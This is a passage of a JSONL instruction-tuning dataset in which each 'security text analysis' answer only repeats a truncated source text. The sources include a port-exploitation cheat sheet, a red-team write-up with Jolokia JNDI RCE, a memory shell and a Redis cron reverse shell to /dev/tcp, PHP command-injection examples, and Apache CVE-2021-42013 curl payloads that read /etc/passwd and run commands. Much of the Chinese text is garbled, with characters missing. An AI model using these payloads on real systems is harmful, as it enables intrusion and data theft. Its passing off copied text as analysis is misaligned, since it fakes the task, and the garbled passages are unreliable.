bytes 一次写 .I bytes 字节默认是512 .TP .BI \"bs=\" bytes 一次读和写 .I bytes 字节这将覆盖 .B ibs 和 .BR obs 设定的值并且设定 .B bs 不等于同时将 .B ibs 和 .B obs 设为同一个值至少在 只使用 .BR sync , .B noerror 或 .B notrunc 转换时是这样的因为bs规定每个输入块都应作为单独 的数据块拷贝到输出而不把较短的块组合到一起 .TP .BI \"cbs=\" bytes 为 .B block 转换和 .BR unblock 转换指定转换块的大小 .TP .BI \"skip=\" blocks 在拷贝之前跳过输入文件的前 .I blocks 块每块大小为 .BR ibs \\-byte 字节 .TP .BI \"seek=\" blocks 在拷贝之前跳过输出文件的前 .I blocks 块每块大小为 .BR obs \\-byte 字节 .TP .BI \"count=\" blocks 只拷贝输入文件的前 .I blocks 块每块的大小为 .BR ibs \\-byte 字节而不是全部内容直到文件末尾 .TP .BI \"conv=\" 转换\"[,\" 转换\"]...\" 将文件按 .I 转换 参数指定的方式转换在\\(lq,\\(rq两边没有空格 .RS .PP 转换方式包括 .PP .TP .B ascii 将EBCDIC转换成ascii .TP .B", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 端口安全 `记录一些端口渗透时的方法和思路` --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 大纲 * [Tips](#tips) * [7](#7) * [21](#21) * [22](#22) * [23](#23) * [25/465/587](#25465587) * [43](#43) * [53](#53) * [67/68](#6768) * [102](#102) * [123](#123) * [137/139/389/445/901](#137139389445901) * [139/445](#139445) * [161](#161) * [389](#389) * [443](#443) * [445](#445) * [502](#502) * [554/8554](#5548554) * [873](#873) * [902](#902) * [990](#990) * [1090/1099](#10901099) * [1433](#1433) * [1494](#1494) * [1521](#1521) * [1883](#1883) * [2049](#2049) * [2181](#2181) * [2375](#2375) * [2598](#2598) * [3000](#3000) * [3128](#3128) * [3306](#3306) * [3333](#3333) * [3389](#3389) * [4100](#4100) * [4592](#4592) * [4786](#4786) * [4848](#4848) * [5000](#5000) * [5432](#5432) * [5555](#5555) * [5632](#5632) * [5800/5900/5901](#580059005901) * [5984](#5984) * [5985/5986](#59855986) * [6129](#6129) * [6379](#6379) * [6970](#6970) * [7001/7002](#70017002) * [8123](#8123) * [80/443/8080~10000](#80443808010000) * [11211](#11211) * [27017/27018](#2701727018) * [50000/50001](#5000050001) * [50010/50030/50070](#500105003050070) --- **相关文章** - [渗透基础 | 黑客常用端口利用总结](https://www.secpulse.com/archives/117822.html) --- ## Tips 1. 对于少见的端口号,建议可以在 shodan 上搜索看看,找找同类业务,找找灵感. 2. 2019-11-14:最近发现火绒会拦截本地对外扫描(包括虚拟机) POC 的流量,等我注意到时真是感觉亏了1个亿,同理,其他杀软也可能会有这种情况,所以对于漏扫明明爆出漏洞,EXP 却利用不了的时候请看看是不是自己本地的问题. --- ## 7 `echo` - 概述 echo 服务正在此主机上运行 回声服务旨在用于测试和测量目的并且可以侦听 TCP 和 UDP 协议 服务器将发送回接收到的所有数据而无需进行任何修改 通过将 echo 服务连接到同一台或另一台计算机上的 echo 服务可能会导致拒绝服务 由于产生的数据包数量过多可能会有效地使受影响的计算机停止服务 - 测试访问 ```bash nc -uvn <IP> 7 Hello echo #This is wat you send Hello echo #This is the response ``` --- ## 21 `FTP` / `tftp` / `vsftpd` - 试试匿名账号 anonymous anony@mous - 爆破弱口令 --- ## 22 `SSH` - 试试服务账号,比如他有承载 ORACLE 数据库,就试试 oracleorcl 这种,其他服务同理,略 - 用户名枚举,例如 CVE-2018-15473 - 爆破弱口令 - [SNETCracker](https://github.com/shack2/SNETCracker) - [ncsa/ssh-auditor](https://github.com/ncsa/ssh-auditor) --- ## 23 `Telnet` - 爆破弱口令 - 推荐工具 : [SNETCrack", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 前 如有技术交流或渗透测试/代码审计/红队向培训/红蓝对抗评估需求的朋友 欢迎联系QQ/VX-547006660 前两天在国企的朋友遇到了个棘的靶标听说之前没能从外打点进去只能靠万防墙取证 我听来了兴趣在梦中臆造了个靶场进渗透并且该梦境已获得相关授权 还请各位看官请勿对号座如有雷同纯属巧合 0x01 钓打点 官发现了客服联系式 通过修改 shellcode特征的CS + 免杀加载器直接做出免杀  改后缀名为exe(懂的都懂)直接话术钓客服(现在客服都聪明了直接exe是肯定钓不到的)获得其桌记 事本 记事本中翻出来了后台地址但是并没有账号密码(有也没有因为有Google验证码) http://xxxxx/xxxxx-admin/ 0x02 FUZZ得到Spring Actuator泄露并分析信息 FUZZ了下出了级录Spring Actuator的泄露 http://xxxxx/xxxxx-admin/actuator/ 发现了朋友jolokia jolokia组件熟悉Spring测试的兄弟都知道不出意外可以直接秒~ 访问了个常的端点 http://xxxxx/xxxxx-admin/actuator/env 通过env端点可知该后台托管在亚逊云并且没有泄露aksk等信息 翻来覆去只看到有个redis的密码 看了下beans端点并没有找到能来直接dump出星号密码的合适Mbean所以放弃直接通过jolokia调 mbean获取明 http://xxxxx/xxxxx-admin/actuator/heapdump 通过下载heapdump进Mat分析 select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains(\"password\")) 调试后发现redis配置的链接地址是127.0.0.1密码为空但是并没有开放端外链那只能先留着了 0x03 Jolokia Realm JNDI注 rce https://xxxx/xxxxx-admin/actuator/jolokia/ 根据得到jolokia端点 直接RCE打试试 利条件为 标站/jolokia/list 接存在 type=MBeanFactory 和 createJNDIRealm 关键词 请求可出外 命令编码地址http://www.jackson-t.ca/runtime-exec-payloads.html 编码反弹Shell的命令 JNDI-Injection-Exploit直接起个恶意Rmi服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C \"command\" -A vps_ip 直接修改好脚本 https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jnd i-rce.py 运不错标出直接秒了 www权限 0x04反弹shell后的取证 historylasthosts中间件志等常规取证就不说了 标的运维还是较谨慎的没有直连是以台亚逊云的主机为跳板进SSH链接 进程看了下web程序的是MVC架构 0x05 注内存 为了防反弹的Shell随时GG所以选择注个内存到Tomcat 较恶的是标的MVC架构路由默认都是直接302跳转后台的路由导致不少内存没法直接时间紧 急去Git翻了个 https://github.com/WisteriaTiger/JundeadShell 直接受控机梭哈 挂上Burp访问靶标找到了个不302跳转的接加上密码访问内存成功 0x06 借redis权限提升 标为www权限且的亚逊云及时打了补丁最近的番号pkexecdirty pipe等测试后不好使脏等 古董更不 GUIDSUID查了遍没有误配 最后都快放弃的时候看了眼进程redis是以root权限运的...天助我也 wget x.x.x.x:50000/agent_starter.jar nohup java -jar agent_starter.jar \"java_process_name\" 8 & 直接通过端转发程序把redis的端转发到本地 利redis写计划任务 PS:Ubuntu下会因为夹杂了脏数据导致语法法识别任务失效但对于centos系统则没有影响可以成功被利 靶标为centos nc监听本地没过会root权限的shell就弹回来了 echo -e \"\\n\\n*/1 * * * * /bin/bash -i >& /dev/tcp/xx.xx.xx.xx/4444 0>&1\\n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2/25/2007 Slide 1 Offensive Computing Malware Secrets Valsmith (Valsmith@offensivecomputing.net) Delchi (delchi@offensivecomputing.net) 2/25/2007 Slide 2 Offensive Computing  Malware Secrets Valsmith BACKGROUND: Malware analyst Penetration tester Exploit developer Reverse Engineer AFFILIATIONS: OffensiveComputing Metasploit cDc/NSF 2/25/2007 Slide 3 Offensive Computing  Malware Secrets Delchi BACKGROUND: Incident Response Intrusion Detection Data Mining / Log Correlation AFFILIATIONS: OffensiveComputing cDc/NSF 2/25/2007 Slide 4 Offensive Computing  Malware Secrets What is this?  Offensive Computing  What we do  Database  Findings  Packers  AV statistics  URLs  Other Interesting Data  Future  Questions 2/25/2007 Slide 5 Offensive Computing  Malware Secrets Offensive Computing  Malware Blog  Posts from OC members and community  Interesting malware discussions  Rustok  Dolphin Stadium trojan  Symantec Worm / Big Yellow  Sample Collection  140,054 samples and growing  Available for download  Auto-Analysis  Uploaded samples baseline analyzed 2/25/2007 Slide 6 Offensive Computing  Malware Secrets Database  Database of associated malware information  Searchable web interface  File typing  Multiple Checksums (md5,sha1,sha256)  Packer detection (modified msfpescan)  Multiple Anti-Virus scan  Bitdefender Kaspersky  Antivir Avast  Clamav AVG  F-Prot F-Secure  McAfee More coming 2/25/2007 Slide 7 Offensive Computing  Malware Secrets Database  PE Info  Based on PEFile project from Ero Carrera with contributions by Danny Quist, OC  Binary archive  Strings  File size  Auto-unpacking coming soon! (see our other talk) 2/25/2007 Slide 8 Offensive Computing  Malware Secrets Findings  Ok so we have all this malware, now what?  Time to mine the data  What might be interesting?  Packer statistics  Common strings  URLs (call back, command and control, droppers)  E-mail addresses  IP addresses 2/25/2007 Slide 9 Offensive Computing  Malware Secrets How these statistics were gathered  Files", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 从commons-fileupload源码看件上传绕waf 之前hvv的时候遇到个件上传有waf没绕过去就想着从件上传解析流程看看有什么可利的地 于是有了这篇章 那次主要是件名的地绕不过去尝试了挺多法就不说了 先搭建了个和标类似的环境使commons-fileupload做件上传 先在 formLists = fileUpload.parseRequest(request); 处打断点跟件上传解析流 程 注意到下肯定是以及解析完了那么解析的地肯定在箭头处 跟到 org.apache.commons.fileupload.FileUploadBase.FileItemIteratorImpl#Fil eItemIteratorImpl 前 filename获取流程 2 注意到这个地也就是说我们的 Content-Type 其实只要开头为 multipart/ 就可以不要 fo rm-data 后就是根据 boundary 把请求进分割 中间过程不想讲太多也有些较有趣的地我们直接到获取件名的地 org.apache.commons.fileupload.FileUploadBase#getFileName(java.lang.String) 3 此处进解析然后获取filename的值 这就是获取参数名和参数值跟 parseToken 4 isOneOf geToken 5 概意思是先分号将 form-data; name=\"file\"; filename=\"11111.jsp\" 分割然后获取 等于号前的值 注意到 Character.isWhitespace 6 这个是判断师傅是空字符且不我们常的空格还包括 此时想到了绕waf的点了我们可以在filename的前后加这种空符导致waf匹配不到我们上传件 名我们上传依然可以解析 Plain Text 复制代码 %20 %09 %0a %0b %0c %0d %1c %1d %1e %1f 1 2 3 4 5 6 7 8 9 10 7 此件名处已经绕过waf内容处绕法很多就不讲了 当时就注意到这个地后仔细看了还有很多点然后还看了.NET 的 context.Request.Files 也有些有趣的地家可以去看看", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNetwork Nightmare Ruling the nightlife between shutdown and boot with pxesploit #whoami  Matt Weeks  Scriptjunkie if you hang out on irc  I have a twitter but I dont use it  http://www.scriptjunkie.us/  scriptjunkie {shift+2} scriptjunkie.us Whats going on here  Want to compromise another system on the LAN?  Could write an amazing 0-day for [list running network services]  But that can take a lot of time  Fuzzing/static analysis -> Vulnerability ID -> Identify exploitation path -> Bypass protections -> blah blah blah -> and you still need to escalate privs Easier way?  How about we try an offline attack? Offline attacks  Evil maid attack  Rubber hose cryptanalysis Downsides  Usually require physical access  Usually not very stealthy  Often could wind up with a lot of jail time  Of course lots of pentesters have flown places, snuck in buildings, and physically accessed systems PXE  Intel-introduced firmware to boot from NIC  BIOS-level access  Bypasses application defenses/host firewalls/OS protections/AV  Independent of OS  Works over network  Full system control How it works  Step 1  Your computer shuts down How it works  Step 2  Wake up  somethings different PXE Proliferation  Almost every system BIOS I have looked at is PXE-capable  I have no stats on how widely it is turned on  I have seen it used, I have seen it left on, I have seen it turned off  I do not have a lot of experience Why would Intel do this to us?  My guess at top syadmin reasons:  Used for image deployment  Used for system restoration  Not used, but ready for OS upgrades  Whats that? I have that on? How PXE works  DHCP extension  Client sends DHCPDISCOVER with PXE option  Server sends DHCPOFFER with server IP addresses, other information  Repeat with DHCPREQUEST/DHCPACK  TFTP Download from identified server  Executes code  Magic PXE Difficulties  DHCP extension  Must be on LAN, beat real DHCP server  Forwards to TFTP  Need one o these servers too  Downloads/executes code  Code running on bare met", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Dark Side of Winsock - Lecture Notes (C) 2005 Jonathan Levin, All Rights Reserved 1 The Dark Side of Winsock By Jonathan Levin DefCon XIII, Las Vegas Http://www.securicy.net/Talks/dc-spi.pdf The Dark Side of Winsock - Lecture Notes (C) 2005 Jonathan Levin, All Rights Reserved 2 Introduction & Nomenclature You probably already know this but IP communications are implemented using the socket API. A socket is a transport endpoint, used to send/receive data. The application reads from/writes to the socket, much as it would to any other file descriptor The OS transparently fragments/encapsulates the data. This talk assumes youve seen sockets in action before. Be it in Stevens legendary tomes (TCP/IP Illustrated, UNIX Network Programming..) or elsewhere. The Dark Side of Winsock - Lecture Notes (C) 2005 Jonathan Levin, All Rights Reserved 3 Introduction & Nomenclature You probably already know this too, but In UNIX, sockets follow the Berkeley (BSD) model closely Windows adapted the BSD socket API into WinSock: Winsock 1.x was a close adaptation of the BSD API Winsock 2.x added new features - Asynchronous calls & callbacks - Overlapped I/O - The layered service provider (LSP) architecture (more) The Dark Side of Winsock - Lecture Notes (C) 2005 Jonathan Levin, All Rights Reserved 4 Introduction & Nomenclature However, not too many people know that Winsocks Layered Service Provider architecture provides powerful hooking functionality enabling interception, eavesdropping or rerouting of almost all IP based traffic in windows platforms. (more) This talk will focus on the LSP, presenting its useful (legitimate) applications, and even more useful (but less legitimate) ones. The Dark Side of Winsock - Lecture Notes (C) 2005 Jonathan Levin, All Rights Reserved 5 Winsock 2 Architecture Windows is designed in a scalable, multi-layered architecture: The Winsock 2 API provides the main The Winsock 2 API provides the main entry point for applications. The entry point for applicat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com PHP 漏洞全解 1-9 PHP 漏洞全解(一)-PHP 网页的安全性问题 针对 PHP 的网站主要存在下面几种攻击方式: 1命令注入(Command Injection) 2eval 注入(Eval Injection) 3客户端脚本攻击(Script Insertion) 4跨网站脚本攻击(Cross Site Scripting, XSS) 5SQL 注入攻击(SQL injection) 6跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7Session 会话劫持(Session Hijacking) 8Session 固定攻击(Session Fixation) 9HTTP 响应拆分攻击(HTTP Response Splitting) 10文件上传漏洞(File Upload Attack) 11目录穿越漏洞(Directory Traversal) 12远程文件包含攻击(Remote Inclusion) 13动态函数注入攻击(Dynamic Variable Evaluation) 14URL 攻击(URL attack) 15表单提交欺骗攻击(Spoofed Form Submissions) 16HTTP 请求欺骗攻击(Spoofed HTTP Requests) 几个重要的 php.ini 选项 Register Globals PHP 漏洞全解(二)-命令注入攻击 命令注入攻击 PHP 中可以使用下列 5 个函数来执行外部的应用程序或函数 systemexecpassthrushell_exec(与 shell_exec 功能相同) 函数原型 string system(string command, int &return_var) command 要执行的命令 return_var 存放执行命令的执行后的状态值 string exec (string command, array &output, int &return_var) command 要执行的命令 output 获得执行命令输出的每一行字符串 return_var 存放执行命令后的状态值 void passthru (string command, int &return_var) command 要执行的命令 return_var 存放执行命令后的状态值 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com string shell_exec (string command) command 要执行的命令 漏洞实例 例 1: //ex1.php <?php $dir = $_GET[\"dir\"]; if (isset($dir)) { echo \"<pre>\"; system(\"ls -al \".$dir); echo \"</pre>\"; } ?> 我们提交 http://www.sectop.com/ex1.php?dir=| cat /etc/passwd 提交以后命令变成了 system(\"ls -al | cat /etc/passwd\"); eval 注入攻击 eval 函数将输入的字符串参数当作 PHP 程序代码来执行 函数原型: mixed eval(string code_str) //eval 注入一般发生在攻击者能控制输入的字符串的时候 //ex2.php <?php 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com $var = \"var\"; if (isset($_GET[\"arg\"])) { $arg = $_GET[\"arg\"]; eval(\"\\$var = $arg;\"); echo \"\\$var =\".$var; } ?> 当我们提交 http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了 动态函数 <?php func A() { dosomething(); } func B() { dosomething(); } if (isset($_GET[\"func\"])) { $myfunc = $_GET[\"func\"]; echo $myfunc(); } ?> 程序员原意是想动态调用 A和 B函数那我们提交 http://www.sectop.com/ex.php?func=phpinfo 漏 洞产生 防范方法 1尽量不要执行外部命令 2使用自定义函数或函数库来替代外部命令的功能 3使用", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInside Flash: Flash Exploit Detec4on Uncovered Ga1ois & Bo Qu About us  Security Researchers in PANW  Work  IPS  APT Detec=on  A>er work  Vulnerability discovery  Exploit technique researching Agenda  Iden=fy (Possible) Exploit  Stop Exploit  Detect Exploit Part 1 : Iden=fy Possible Exploit Find vector in loop using sta=c detec=on Find opcode pa<ern of loop  Compile tools  As3compile.exe  Asc.jar two embeded abc file needed  Mxmlc in flexsdk  Flash Builder  Flash CS* professional  Command line decompile tools  Swfdump.exe in sw>ools  Swfdump.py in mecheye-fusion  Swfdump.jar/swfdump.exe in flex  we use it  3 types of loop  For  While  Do/while Simplest situa4on MXMLC Swfdump SWF Dowhile for AS3 Algorithm def FindVecInLoop: For i in range(0,len(line)): If find jump opcode i = line_of_jump_opcode get Jump_label for j in range(line_of_jump_opcode+1, len(line)) If find jump_label get cur_line_cnt for k in range(cur_line_cnt+1, len(line)) if find if: get the if_label if line_of_if_label == line_of_jump_opcode+1 print find loop get loop_body find vector in loop_body check the 3rd argument of construct, if vector bingo! Find opcode pa<ern of loop  demo Limita4on and solu4on  Bad news  Loadbytes for obfusca=on  Not use loop[jmp or goto or repeat one statement for many =mes]  Func=on calls in loop body  Good news  Hook and generate inner real exploit SWF  The pafern itself can be detected  Check deeper Part 2 : Stop Exploit A Lightweight PageHeap for FixedMalloc in Flash Page heap on windows process heap  A diagnos=c op=on that can detect OBA(Out of Bounds Access) and UAF(Use A>er Free) bugs  OBA  UAF 4096 4096 4096 1 page NO_Access Heap block 1 page OBA NO_Access CRASH ! 4096 4096 4096 free NO_Access use CRASH ! Custom Heap in Flash MMgc GCHeap GC FixedMalloc m_allocs[ ] Used buffer Ptr to next free block Free buffer Same size in one bucket Different sizes Custom Heap in Flash MMgc GCHeap GC Toplevel: ArrayObject ByteArrayObject VectorObject  NaTve: BitmapDataObject SoundObject  Fixed", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1092-通过可移动媒介传播 ## 来自ATT&CK描述 攻击者可以使用可移动媒体在可能断开网络链接的受感染主机之间执行命令和控制用于在系统之间传输命令这两个系统都需要被攻破一个连接互联网的系统可能首先被攻陷其次是通过可移动媒体复制的横向移动命令和文件将从断开连接的系统中继到攻击者可以直接访问的互联网连接系统 ## 检测 监控可移动媒体上的文件访问检测安装可移动媒体时执行的进程国内很多终端桌面管理系统可以对U盘行为进行有效监控 ## 参考推荐 MITRE-ATT&CK-T1092 <https://attack.mitre.org/techniques/T1092>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"SELECT\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME SELECT \\- 从表或视图中取出若干行 .SH SYNOPSIS .sp .nf SELECT [ ALL | DISTINCT [ ON ( \\fIexpression\\fR [, ...] ) ] ] * | \\fIexpression\\fR [ AS \\fIoutput_name\\fR ] [, ...] [ FROM \\fIfrom_item\\fR [, ...] ] [ WHERE \\fIcondition\\fR ] [ GROUP BY \\fIexpression\\fR [, ...] ] [ HAVING \\fIcondition\\fR [, ...] ] [ { UNION | INTERSECT | EXCEPT } [ ALL ] \\fIselect\\fR ] [ ORDER BY \\fIexpression\\fR [ ASC | DESC | USING \\fIoperator\\fR ] [, ...] ] [ LIMIT { \\fIcount\\fR | ALL } ] [ OFFSET \\fIstart\\fR ] [ FOR UPDATE [ OF \\fItable_name\\fR [, ...] ] ] where \\fIfrom_item\\fR can be one of: [ ONLY ] \\fItable_name\\fR [ * ] [ [ AS ] \\fIalias\\fR [ ( \\fIcolumn_alias\\fR [, ...] ) ] ] ( \\fIselect\\fR ) [ AS ] \\fIalias\\fR [ ( \\fIcolumn_alias\\fR [, ...] ) ] \\fIfunction_name\\fR ( [ \\fIargument\\fR [, ...] ] ) [ AS ] \\fIalias\\fR [ ( \\fIcolumn_alias\\fR [, ...] | \\fIcolumn_definition\\fR [, ...] ) ] \\fIfunction_name\\fR ( [ \\fIargument\\fR [, ...] ] ) AS ( \\fIcolumn_definition\\fR [, ...] ) \\fIfrom_item\\fR [ NATURAL ] \\fIjoin_type\\fR \\fIfrom_item\\fR [ ON \\fIjoin_condition\\fR | USING ( \\fIjoin_column\\fR [, ...] ) ] .sp .fi [Comment: FIXME: This last syntax is incorrect if the join type is an INNER or OUTER join (in which case one of NATURAL, ON ..., or USING \\&... is mandatory, not optional). What's the best way to fix this?] .SH \"DESCRIPTION 描述\" .PP \\fBSELECT\\fR 将从一个或更多表中返回记录行 SELECT 通常的处理如下 .IP 1. 计算列出在 FROM 中的所有元素FROM 中的每个元素都是一个真正的或者虚拟的表如果在 FROM 列表里声明了多过一个元素那么他们就交叉连接在一起参阅下面的 FROM Clause [\\fBselect\\fR(7)]  .IP 2. 如果声明了 WHERE 子句那么在输出中消除所有 不满足条件的行参阅下面的 WHERE Clause [\\fBselect\\fR(7)]  .IP 3. 如果声明了 GROUP BY 子句输出就分成匹配一个或多个数值的不同组里 如果出现了 HAVING 子句那么它消除那些不满足给出条件的组参阅下面的 GROUP BY Clause [\\fBselect\\fR(7)] 和 HAVING Clause [\\fBselect\\fR(7)]  .IP 4. 使用 UNIONINTERSECT 和 EXCEPT我们可以把多个 SELECT 语句的输出合并成一个结果集UNION 操作符返回在两个结果集或者其中一个中的行 INTERSECT 操作符返回严格地在两个结果集中都有的行 EXCEPT 操作符返回在第一个结果集中但是不在第二个结果集中的行不管哪种情", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuying time - What is your data worth? \"The power which money gives is that of brute force; it is the power of the bludgeon and the bayonet.\" -- William Cobbett \"When in doubt, use brute force.\" -- Ken Thompson Who am I? Adam Bregenzer (adam@bregenzer.net, adam@sli.cc)  Member of Kaos Theory and DC404  Developer for Anonym.OS and SAMAEL  Developer for GroupHug.us Distributed What? Scalable password cracking Can use word lists, character brute forcing, rainbow tables, or anything you can think of! Can produce  the answer, rainbow tables, or again, anything you can think of! Provides a flexible framework for cracking passwords across a network of computers. So, why do I care? Brute forcing is an assumed risk and often dismissed The ability to rent computers, or access to grid computing and storage means that processing power is infinite CPU = hard dollar cost, therefore password cracking has a hard dollar cost Your passwords have a fixed, decreasing cost that is based on their complexity and application How is this useful? Password strength is one way of measuring the safety of your data. Practical security can be measured as the relationship between the efforts required to break your security and the value of your data Therefore the value of your data is analogous to your password's strength, or price. This is BAD! Distributed attacks against password hashes rapidly reduce this cost. As do Rainbow tables Additionally, Moore's Law means this cost will halve every two years. Botnets today have enough processing power crack your passwords! A practical model - libattkthread Helper code to facilitate multi-threaded cracking Only need to write a simple function to process cracking a single word. Asynchronus, interruptable, extendable. Resulting library can be extended to take advantage of distributed processing framework Quick Tech Review Password Attacks  Different types  brute force, dictionary, rainbow  tables  Prevention mechanisms  Salts, limited retries Distributed C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSQLITE 44310 sqlite sqlitesql sqlite 1. sqlite3_snprintf(size,sqlstr,fmt,args...) 2. sqlite3_exec() sqlite3_snprintfcsnprintffmt sqlite3_snprintf(100,sqlstr,\"select * from table where name = '%s';\",name); name'pikaqiu'sqlstr \"select * from table where name = 'pikaqiu';\" sqlsqlite3_exec() sqlite sqlite3_snprintffmt'%q' 1. 2. \\ 3. sqlite\\ 4. '%q'' sqliteexec';' token sqlite ' ','\\t','\\n','\\f','\\r' ''','\"','`' namepasswd sqlite3_snprintf(100,sqlstr,\"select * from table where name = '%q' and password = '%q';\",name,passwd); sqlite3_exec(sqlstr) %qsize100 namepassword100 select * from table where name = 'aaaaaaaaaaaaaaaa...aaaaaaaaaaaaaa' update update usertable set password='%q' where name = '%q'; password", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGPS SPOOFING Low-cost GPS simulator HUANG Lin, YANG Qing Unicorn Team  Radio and Hardware Security Research Qihoo 360 Technology Co. Ltd. Who we are? Unicorn Team  Qihoo360s UnicornTeam consists of a group of brilliant security researchers. We focus on the security of anything that uses radio technologies, from small things like RFID, NFC and WSN to big things like GPS, UAV, Smart Cars, Telecom and SATCOM.  Our primary mission is to guarantee that Qihoo360 is not vulnerable to any wireless attack. In other words, Qihoo360 protects its users and we protect Qihoo360.  During our research, we create and produce various devices and systems, for both attack and defense purposes.  We are one of the DEF CON 23 vendors. https://defcon.org/html/defcon-23/dc-23-vendors.html YANG Qing  YANG Qing is the team leader of Unicorn Team.  He has rich experiences in wireless and hardware security area, including WiFi penetration testing, cellular network interception, IC card cracking etc. His interests also cover embedded system hacking, firmware reversing, automotive security, and software radio.  He is the first one who reported the vulnerabilities of WiFi system and RF IC card system used in Beijing subway. HUANG Lin  One of the early USRP users in China. Got the first USRP board in 2005 in Orange Labs  Authored some tutorials about GNU Radio which were popular in China  Made great effort on promoting Cloud-RAN technology in China from 2010 to 2013  Join Qihoo 360 as a wireless security researcher in 2014 Beginning of the story  Civilian-use GPS C/A Signal GPS C/A signal is for civilian usage, and unencrypted. Replay attack is a typical GPS spoofing method. Record Replay Firstly try replay attack  Hardware  USRP B210  Active GPS antenna  Bias-tee circuit (Mini-Circuit ZX85-12G-S+)  LNA (Mini-Circuit ZX60-V82-S+) Record GPS signal by a USRP B210 Replay the signal by a bladeRF Success! Record then replay the GPS signal. You can see the cellphone gets the position and timing informat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache HTTP Server 2.4.50 路径穿越漏洞CVE-2021-42013 Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞[CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773)进行了修复但这个修复是不完整的CVE-2021-42013是对补丁的绕过 攻击者利用这个漏洞可以读取位于Apache服务器Web目录以外的其他文件或者读取Web目录中的脚本文件源码或者在开启了cgi或cgid的服务器上执行任意命令 这个漏洞可以影响Apache HTTP Server 2.4.49以及2.4.50两个版本 参考链接 - https://httpd.apache.org/security/vulnerabilities_24.html - https://twitter.com/roman_soft/status/1446252280597078024 ## 漏洞环境 执行如下命令编译及运行一个存在漏洞的Apache HTTP Server 2.4.50版本服务器 ``` docker compose build docker compose up -d ``` 环境启动后访问`http://your-ip:8080`即可看到Apache默认的`It works!`页面 ## 漏洞利用 我们使用[CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773)中的Payload已经无法成功利用漏洞了说明2.4.50进行了修复 但我们可以使用`.%%32%65`进行绕过注意其中的`/icons/`必须是一个存在且可访问的目录 ``` curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd ``` 可见成功读取到`/etc/passwd` ![](1.png) 在服务端开启了cgi或cgid这两个mod的情况下这个路径穿越漏洞将可以执行任意命令 ``` curl -v --data \"echo;id\" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' ``` ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to Build Your Very Own Sleep Lab: The Execution Presented by: Keith Biddulph & Ne0nRa1n Overview What does it do? We're collecting data for later interpretation: Electroencephalogram (EEG) Heart rate monitor (HRM) Electronic Ocular Monitor (EOM) Infrared pictures Overview What does it not do? Breathing measurements Skin response on face Why not? Restless leg and apnea are obvious to an outside observer Overview A series of devices connected to an ordinary desktop PC: ModularEEG implementation of the OpenEEG project Interfaces with a desktop PC via RS 232 serial port Homebrew microcontroller (Atmel Atmega128) device to collect other signals Also Interfaces with a desktop PC via serial port USB Webcam modded to see only IR Hardware overview OpenEEG overview Microcontroller data collection device Sensor choice ModularEEG from OpenEEG project Cheap ($<200 to build) Well tested (Initial release in 2003) Prebuilt PCBs available Open Source Needed to detect stage of sleep Sensor choice Wireless heartrate monitor by Oregon Scientific Super cheap off of eBay ($<20) Signal to find was relatively simple Needed to verify that monitored user is calm Sensor choice EOM  Fairchild QRB1134 Very cheap Well documented Simple Used to verify REM Construction pitfalls ModularEEG  Buy it preassembled! Took hours of cramped soldering Easy to make solder bridges or short to ground plane Easy to put ICs in backwards Does not include a power supply Construction highlights On the fly construction: Op-amp for HRM to boost signal from 1Vpp to 5vpp Adding first-order filters to remove noise from incoming circuits Finding new and interesting uses for soldering irons Initial Data We plugged theEEG in and nothing caught on fire! EEG capture when subject was asked about their favourite topic Initial Data HRM and EOM verified to be working: Initial Data Disclaimer: We are not doctors, nor do we pretend to be It is rare, but possible to give yourself an electric shock with this equipment There is n", "category": 